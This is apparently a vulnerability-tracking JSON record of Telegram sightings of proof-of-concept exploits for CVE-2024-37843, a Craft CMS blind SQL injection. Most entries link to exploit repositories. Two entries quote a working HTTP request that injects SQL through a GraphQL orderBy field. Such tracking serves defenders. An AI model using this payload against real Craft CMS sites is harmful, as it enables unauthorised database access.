{"vulnerability": "CVE-2024-37843", "sightings": [{"uuid": "32e47e22-daea-411b-b981-278df14e5d08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/114", "content": "#exploit\n1. HEVD Exploit:\nBufferOverflowNonPagedPoolNx on Win10 22H2 - Escalating from Low Integrity to SYSTEM via Aligned Chunk Confusion\nhttps://github.com/ommadawn46/HEVD-BufferOverflowNonPagedPoolNx-Win10-22H2\n\n2. CVE-2024-37843:\nCraft CMS time-based blind SQLi\nhttps://github.com/gsmith257-cyber/CVE-2024-37843-POC", "creation_timestamp": "2024-08-04T10:54:02.000000Z"}, {"uuid": "3e6426ae-55f8-4b6b-be92-1bf8846959de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "Telegram/GAGweLsjUHO08v93h7Cnk4JIohd6mOph5G5IJ8nyyZIxNfo", "content": "", "creation_timestamp": "2024-09-08T07:41:49.000000Z"}, {"uuid": "f9777920-c77c-43d7-a584-439998eb2212", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10932", "content": "#exploit\n1. HEVD Exploit:\nBufferOverflowNonPagedPoolNx on Win10 22H2 - Escalating from Low Integrity to SYSTEM via Aligned Chunk Confusion\nhttps://github.com/ommadawn46/HEVD-BufferOverflowNonPagedPoolNx-Win10-22H2\n\n2. CVE-2024-37843:\nCraft CMS time-based blind SQLi\nhttps://github.com/gsmith257-cyber/CVE-2024-37843-POC", "creation_timestamp": "2024-08-04T16:46:18.000000Z"}, {"uuid": "f21de775-7a72-4681-9b50-2904d6938f24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7693", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC for CVE-2024-37843. Craft CMS itm-based blind SQLi\nURL\uff1ahttps://github.com/gsmith257-cyber/CVE-2024-37843-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-18T02:30:04.000000Z"}, {"uuid": "bacbd21d-2b85-4583-b50b-e81d933f0fbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2941", "content": "CraftCMS SQL CVE-2024-37843\n\nPOST /api/ HTTP/1.1\nHost: 127.0.0.1\n\n{\"query\":\"query  IntrospectionQuery  {assets(orderBy: \\\"assets.volumeId,extractvalue(1,concat(0x0a,concat('{{1}}',version()))) --\\\", limit: 5){filename}}\"}\n\n#exploit #poc #SQL", "creation_timestamp": "2024-08-02T17:15:54.000000Z"}, {"uuid": "cdc11837-9a64-456b-abc2-f9ab4a868aee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2945", "content": "https://github.com/gsmith257-cyber/CVE-2024-37843-POC\n\nPOC for CVE-2024-37843. Craft CMS time-based blind SQLi\n#github #poc #SQL", "creation_timestamp": "2024-08-05T03:25:02.000000Z"}, {"uuid": "49a8e55a-93ad-4343-a876-afd48e725c0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/ckeArsenal/142", "content": "CraftCMS SQL CVE-2024-37843\n\nPOST /api/ HTTP/1.1\nHost: 127.0.0.1\n\n{\"query\":\"query  IntrospectionQuery  {assets(orderBy: \\\"assets.volumeId,extractvalue(1,concat(0x0a,concat('{{1}}',version()))) --\\\", limit: 5){filename}}\"}\n\n#exploit #poc #SQL", "creation_timestamp": "2024-12-21T15:57:30.000000Z"}, {"uuid": "c3dac80a-0fc8-4c48-b153-5d9b04f34523", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/ckeArsenal/144", "content": "https://github.com/gsmith257-cyber/CVE-2024-37843-POC\n\nPOC for CVE-2024-37843. Craft CMS time-based blind SQLi\n#github #poc #SQL", "creation_timestamp": "2024-12-21T15:57:30.000000Z"}, {"uuid": "cebeff26-6a50-4a4a-8a51-2945bd67ccab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/699", "content": "#exploit\n1. HEVD Exploit:\nBufferOverflowNonPagedPoolNx on Win10 22H2 - Escalating from Low Integrity to SYSTEM via Aligned Chunk Confusion\nhttps://github.com/ommadawn46/HEVD-BufferOverflowNonPagedPoolNx-Win10-22H2\n\n2. CVE-2024-37843:\nCraft CMS time-based blind SQLi\nhttps://github.com/gsmith257-cyber/CVE-2024-37843-POC", "creation_timestamp": "2024-08-04T16:22:02.000000Z"}, {"uuid": "6cee97e4-6a7f-4e6c-a436-286cc997edba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/3544", "content": "#exploit\n1. HEVD Exploit:\nBufferOverflowNonPagedPoolNx on Win10 22H2 - Escalating from Low Integrity to SYSTEM via Aligned Chunk Confusion\nhttps://github.com/ommadawn46/HEVD-BufferOverflowNonPagedPoolNx-Win10-22H2\n\n2. CVE-2024-37843:\nCraft CMS time-based blind SQLi\nhttps://github.com/gsmith257-cyber/CVE-2024-37843-POC", "creation_timestamp": "2024-08-16T11:19:37.000000Z"}]}